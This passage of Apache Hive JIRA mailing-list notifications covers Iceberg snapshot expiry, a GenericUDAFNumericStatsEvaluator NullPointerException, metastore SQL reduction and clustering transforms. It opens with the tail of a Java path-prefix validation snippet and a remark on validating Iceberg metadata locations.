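                "/warehouse/icebergsecured/data/secret.orc")); // false
    }
}
```

A path-prefix check alone would not cover all variants mentioned in the ticket (e.g. a malicious metadata or manifest-list location), so a real fix would need to validate each level of the metadata chain.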
[jira] [Resolved] (HIVE-27633) HMS: MTable to Table process reduces view related SQL
[ https://issues.apache.org/jira/browse/HIVE-27633?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Denys Kuzmenko resolved HIVE-27633. --- Fix Version/s: 4.0.0 Resolution: Fixed > HMS: MTable to Table process reduces view related SQL > - > > Key: HIVE-27633 > URL: https://issues.apache.org/jira/browse/HIVE-27633 > Project: Hive > Issue Type: Improvement > Components: Metastore >Reporter: dzcxzl >Assignee: dzcxzl >Priority: Minor > Labels: pull-request-available > Fix For: 4.0.0 > > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27633) HMS: MTable to Table process reduces view related SQL
[ https://issues.apache.org/jira/browse/HIVE-27633?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791569#comment-17791569 ] Denys Kuzmenko commented on HIVE-27633: --- Merged to master. Thanks for the patch [~dzcxzl], and [~zhangbutao] for the review! > HMS: MTable to Table process reduces view related SQL > - > > Key: HIVE-27633 > URL: https://issues.apache.org/jira/browse/HIVE-27633 > Project: Hive > Issue Type: Improvement > Components: Metastore >Reporter: dzcxzl >Assignee: dzcxzl >Priority: Minor > Labels: pull-request-available > -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE
[ https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791561#comment-17791561 ] Butao Zhang commented on HIVE-27712: This problem is somewhat similar to https://issues.apache.org/jira/browse/HIVE-22633, which may be fixed by https://issues.apache.org/jira/browse/HIVE-23530. Could you please try the patch from HIVE-23530? > GenericUDAFNumericStatsEvaluator throws NPE > --- > > Key: HIVE-27712 > URL: https://issues.apache.org/jira/browse/HIVE-27712 > Project: Hive > Issue Type: Bug >Reporter: liang yu >Assignee: liang yu >Priority: Major > Labels: pull-request-available > Attachments: image-2023-09-19-16-33-49-881.png > > > using Hadoop 3.3.4 > Hive 3.1.3 > when I set the config: > {code:java} > set hive.groupby.skewindata=true; > set hive.map.aggr=true; {code} > and execute a SQL query with a group-by and a join, I get the > NullPointerException below: > > !image-2023-09-19-16-33-49-881.png! -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Resolved] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties
[ https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Ayush Saxena resolved HIVE-27903. - Fix Version/s: 4.0.0 Resolution: Fixed > Iceberg: Implement Expire Snapshot with default table properties > > > Key: HIVE-27903 > URL: https://issues.apache.org/jira/browse/HIVE-27903 > Project: Hive > Issue Type: Improvement > Components: Hive >Affects Versions: 4.0.0-alpha-2 >Reporter: JK Pasimuthu >Assignee: Ayush Saxena >Priority: Major > Labels: pull-request-available > Fix For: 4.0.0 > > > [https://github.com/apache/iceberg/issues/9123] > The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while > expiring snapshots. > # > CREATE TABLE IF NOT EXISTS test5d78b6 ( > id INT, random1 STRING > ) > PARTITIONED BY (random2 STRING) > STORED BY ICEBERG > TBLPROPERTIES ( > 'write.format.default'='orc', > 'format-version'='2', > 'write.orc.compression-codec'='none' > ) > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SLEEP for 30 seconds > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 > 13:23:54.455')) * 1000; > # ALTER TABLE test5d78b6 SET > tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed > time in ms from the second insert and current time > # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10'); > # SELECT COUNT FROM default.test5d78b6.snapshots; > output: 1. It should be 2 rows. The default 1 is retained and all snapshots > are expired as usual, so setting the property has no effect. 
> Additional Info: the default value for 'history.expire.max-snapshot-age-ms' > is 5 days per this link: > [https://iceberg.apache.org/docs/1.3.1/configuration/] > Now while writing the tests and running them, the expiring of snapshots just > worked fine within a few seconds of the snapshots being created. > So, I'm assuming that this option doesn't have any effect right now. Having > said that, I'm thinking about the implications this fix will have on end users. > The end user may not know about this option at all and will have a tough time > figuring out why the snapshots are not getting expired. One option could be > to set the default to 0ms. -- This message was sent by Atlassian Jira (v8.20.10#820010)
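The retention behavior debated above can be sketched as follows, assuming Iceberg-style semantics in which snapshots older than the max-snapshot-age cutoff are expired but the newest min-snapshots-to-keep (default 1) always survive. This is a simplified stand-in, not the actual Iceberg implementation; it shows why exactly one snapshot remains even when every snapshot is past the age limit.

```java
import java.util.ArrayList;
import java.util.List;

public class ExpirySketch {
    // commitTimesMs is sorted ascending (oldest first); returns the
    // surviving commit timestamps after an expire-snapshots run.
    static List<Long> retained(List<Long> commitTimesMs, long nowMs,
                               long maxSnapshotAgeMs, int minSnapshotsToKeep) {
        long cutoff = nowMs - maxSnapshotAgeMs;
        List<Long> keep = new ArrayList<>();
        int n = commitTimesMs.size();
        for (int i = 0; i < n; i++) {
            long t = commitTimesMs.get(i);
            // keep if young enough, or if among the newest minSnapshotsToKeep
            if (t >= cutoff || i >= n - minSnapshotsToKeep) {
                keep.add(t);
            }
        }
        return keep;
    }

    public static void main(String[] args) {
        long now = 100_000L;
        List<Long> commits = List.of(10_000L, 20_000L, 70_000L, 80_000L);
        // Age limit 54s: the two most recent snapshots are young enough.
        System.out.println(retained(commits, now, 54_000L, 1)); // [70000, 80000]
        // Age limit 5s: every snapshot is "too old", yet min-keep=1 still
        // saves the newest one -- mirroring "the default 1 is retained".
        System.out.println(retained(commits, now, 5_000L, 1));  // [80000]
    }
}
```

Under these semantics the ticket's observation makes sense: if the configured age is never consulted, expire_snapshots behaves as though the cutoff is the supplied timestamp alone, and only the min-keep floor prevents deleting everything.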
[jira] [Updated] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties
[ https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Ayush Saxena updated HIVE-27903: Summary: Iceberg: Implement Expire Snapshot with default table properties (was: TBLPROPERTIES('history.expire.max-snapshot-age-ms') doesn't work) > Iceberg: Implement Expire Snapshot with default table properties > > > Key: HIVE-27903 > URL: https://issues.apache.org/jira/browse/HIVE-27903 > Project: Hive > Issue Type: Improvement > Components: Hive >Affects Versions: 4.0.0-alpha-2 >Reporter: JK Pasimuthu >Assignee: Ayush Saxena >Priority: Major > Labels: pull-request-available > > [https://github.com/apache/iceberg/issues/9123] > The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while > expiring snapshots. > # > CREATE TABLE IF NOT EXISTS test5d78b6 ( > id INT, random1 STRING > ) > PARTITIONED BY (random2 STRING) > STORED BY ICEBERG > TBLPROPERTIES ( > 'write.format.default'='orc', > 'format-version'='2', > 'write.orc.compression-codec'='none' > ) > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SLEEP for 30 seconds > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 > 13:23:54.455')) * 1000; > # ALTER TABLE test5d78b6 SET > tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed > time in ms from the second insert and current time > # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10'); > # SELECT COUNT FROM default.test5d78b6.snapshots; > output: 1. it should be 2 rows. 
The default 1 is retained and all snapshots > are expired as usual, so setting the property has no effect. > Additional Info: the default value for 'history.expire.max-snapshot-age-ms' > is 5 days per this link: > [https://iceberg.apache.org/docs/1.3.1/configuration/] > Now while writing the tests and running them, the expiring of snapshots just > worked fine within a few seconds of the snapshots being created. > So, I'm assuming that this option doesn't have any effect right now. Having > said that, I'm thinking about the implications this fix will have on end users. > The end user may not know about this option at all and will have a tough time > figuring out why the snapshots are not getting expired. One option could be > to set the default to 0ms. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27903) Iceberg: Implement Expire Snapshot with default table properties
[ https://issues.apache.org/jira/browse/HIVE-27903?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791550#comment-17791550 ] Ayush Saxena commented on HIVE-27903: - Committed to master. Thanx [~jkcldr] for the report & [~zhangbutao] for the review!!! > Iceberg: Implement Expire Snapshot with default table properties > > > Key: HIVE-27903 > URL: https://issues.apache.org/jira/browse/HIVE-27903 > Project: Hive > Issue Type: Improvement > Components: Hive >Affects Versions: 4.0.0-alpha-2 >Reporter: JK Pasimuthu >Assignee: Ayush Saxena >Priority: Major > Labels: pull-request-available > > [https://github.com/apache/iceberg/issues/9123] > The 'history.expire.max-snapshot-age-ms' option doesn't have any effect while > expiring snapshots. > # > CREATE TABLE IF NOT EXISTS test5d78b6 ( > id INT, random1 STRING > ) > PARTITIONED BY (random2 STRING) > STORED BY ICEBERG > TBLPROPERTIES ( > 'write.format.default'='orc', > 'format-version'='2', > 'write.orc.compression-codec'='none' > ) > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SLEEP for 30 seconds > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # INSERT INTO test5d78b6 SELECT if(isnull(MAX(id)) ,0 , MAX(id) ) +1, > uuid(), uuid() FROM test5d78b6 > # SELECT (UNIX_TIMESTAMP(CURRENT_TIMESTAMP) - UNIX_TIMESTAMP('2023-10-09 > 13:23:54.455')) * 1000; > # ALTER TABLE test5d78b6 SET > tblproperties('history.expire.max-snapshot-age-ms'='54000'); - the elapsed > time in ms from the second insert and current time > # ALTER TABLE test5d78b6 EXECUTE expire_snapshots('2200-10-10'); > # SELECT COUNT FROM default.test5d78b6.snapshots; > output: 1. It should be 2 rows. The default 1 is retained and all snapshots > are expired as usual, so setting the property has no effect. 
> Additional Info: the default value for 'history.expire.max-snapshot-age-ms' > is 5 days per this link: > [https://iceberg.apache.org/docs/1.3.1/configuration/] > Now while writing the tests and running them, the expiring of snapshots just > worked fine within a few seconds of the snapshots being created. > So, I'm assuming that this option doesn't have any effect right now. Having > said that, I'm thinking about the implications this fix will have on end users. > The end user may not know about this option at all and will have a tough time > figuring out why the snapshots are not getting expired. One option could be > to set the default to 0ms. -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Commented] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE
[ https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel=17791523#comment-17791523 ] liang yu commented on HIVE-27712: - Solution: add a check to verify whether _'minFieldOI'_ and _'maxFieldOI'_ are null; if null, call _getValueObjectInspector_ with no arguments. > GenericUDAFNumericStatsEvaluator throws NPE > --- > > Key: HIVE-27712 > URL: https://issues.apache.org/jira/browse/HIVE-27712 > Project: Hive > Issue Type: Bug >Reporter: liang yu >Assignee: liang yu >Priority: Major > Labels: pull-request-available > Attachments: image-2023-09-19-16-33-49-881.png > > > using Hadoop 3.3.4 > Hive 3.1.3 > when I set the config: > {code:java} > set hive.groupby.skewindata=true; > set hive.map.aggr=true; {code} > and execute a SQL query with a group-by and a join, I get the > NullPointerException below: > > !image-2023-09-19-16-33-49-881.png! -- This message was sent by Atlassian Jira (v8.20.10#820010)
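A minimal sketch of the guard described in the comment above. The real evaluator lives in Hive's GenericUDAFNumericStatsEvaluator; the classes, the `resolveMinOI` method, and the overloads below are illustrative stand-ins only, showing the shape of the fix (fall back to the no-argument variant when the field ObjectInspector was never initialized) rather than Hive's actual code.

```java
public class NpeGuardSketch {
    interface ObjectInspector { String typeName(); }
    static class LongOI implements ObjectInspector {
        public String typeName() { return "bigint"; }
    }
    static class DefaultOI implements ObjectInspector {
        public String typeName() { return "default"; }
    }

    // Stand-in for the overload that derives the value OI from a field OI.
    static ObjectInspector getValueObjectInspector(ObjectInspector fieldOI) {
        return fieldOI;
    }
    // Stand-in for the no-argument fallback.
    static ObjectInspector getValueObjectInspector() {
        return new DefaultOI();
    }

    // Before the fix, dereferencing a null minFieldOI/maxFieldOI threw the
    // NPE from the report; after the fix, null routes to the no-arg variant.
    static ObjectInspector resolveMinOI(ObjectInspector minFieldOI) {
        return (minFieldOI == null)
                ? getValueObjectInspector()          // guard: no-arg variant
                : getValueObjectInspector(minFieldOI);
    }

    public static void main(String[] args) {
        System.out.println(resolveMinOI(null).typeName());         // default
        System.out.println(resolveMinOI(new LongOI()).typeName()); // bigint
    }
}
```

The null case corresponds to the skew-data partial-aggregation path in the report, where the evaluator is initialized without the min/max field inspectors.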
[jira] [Updated] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE
[ https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated HIVE-27712: -- Labels: pull-request-available (was: ) > GenericUDAFNumericStatsEvaluator throws NPE > --- > > Key: HIVE-27712 > URL: https://issues.apache.org/jira/browse/HIVE-27712 > Project: Hive > Issue Type: Bug >Reporter: liang yu >Assignee: liang yu >Priority: Major > Labels: pull-request-available > Attachments: image-2023-09-19-16-33-49-881.png > > > using Hadoop 3.3.4 > Hive 3.1.3 > when I set the config: > {code:java} > set hive.groupby.skewindata=true; > set hive.map.aggr=true; {code} > and execute a SQL query with a group-by and a join, I get the > NullPointerException below: > > !image-2023-09-19-16-33-49-881.png! -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Assigned] (HIVE-27712) GenericUDAFNumericStatsEvaluator throws NPE
[ https://issues.apache.org/jira/browse/HIVE-27712?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] liang yu reassigned HIVE-27712: --- Assignee: liang yu > GenericUDAFNumericStatsEvaluator throws NPE > --- > > Key: HIVE-27712 > URL: https://issues.apache.org/jira/browse/HIVE-27712 > Project: Hive > Issue Type: Bug >Reporter: liang yu >Assignee: liang yu >Priority: Major > Attachments: image-2023-09-19-16-33-49-881.png > > > using Hadoop 3.3.4 > Hive 3.1.3 > when I set the config: > {code:java} > set hive.groupby.skewindata=true; > set hive.map.aggr=true; {code} > and execute a SQL query with a group-by and a join, I get the > NullPointerException below: > > !image-2023-09-19-16-33-49-881.png! -- This message was sent by Atlassian Jira (v8.20.10#820010)
[jira] [Updated] (HIVE-27918) Iceberg: Push transforms for clustering during table writes
[ https://issues.apache.org/jira/browse/HIVE-27918?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] ASF GitHub Bot updated HIVE-27918: -- Labels: pull-request-available (was: ) > Iceberg: Push transforms for clustering during table writes > --- > > Key: HIVE-27918 > URL: https://issues.apache.org/jira/browse/HIVE-27918 > Project: Hive > Issue Type: Improvement >Reporter: Sourabh Badhya >Assignee: Sourabh Badhya >Priority: Major > Labels: pull-request-available > > Currently, transformed columns (except for the bucket transform) are not pushed / > passed as clustering columns. This can lead to incorrect clustering on such > columns, which can lead to non-performant writes. > Hence, push transforms for clustering during table writes. -- This message was sent by Atlassian Jira (v8.20.10#820010)
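To illustrate why the transform, rather than the raw column, should drive clustering, the toy sketch below groups rows by a simplified Iceberg-style truncate transform: when rows are clustered on the transformed value, each writer sees one contiguous group per target partition instead of interleaved values. The transform here follows the shape of the Iceberg spec's integer truncate (v - (v mod W)) but is a stand-in, not Iceberg's code.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.TreeMap;

public class ClusteringSketch {
    // Simplified integer truncate transform: truncate[W](v) = v - (v mod W).
    static int truncate(int v, int width) {
        return v - Math.floorMod(v, width);
    }

    // Cluster rows by the *transformed* value, mirroring what pushing the
    // transform as a clustering column achieves during a write.
    static Map<Integer, List<Integer>> clusterByTruncate(List<Integer> values, int width) {
        Map<Integer, List<Integer>> groups = new TreeMap<>();
        for (int v : values) {
            groups.computeIfAbsent(truncate(v, width), k -> new ArrayList<>()).add(v);
        }
        return groups;
    }

    public static void main(String[] args) {
        // Clustering on the raw column would interleave 3, 12, 7, 15 arbitrarily;
        // clustering on truncate(v, 10) yields one group per target partition.
        System.out.println(clusterByTruncate(List.of(3, 12, 7, 15), 10));
        // {0=[3, 7], 10=[12, 15]}
    }
}
```

Without the transform-derived key, rows destined for the same partition can be scattered across tasks, which is the "incorrect clustering ... non-performant writes" problem the ticket describes.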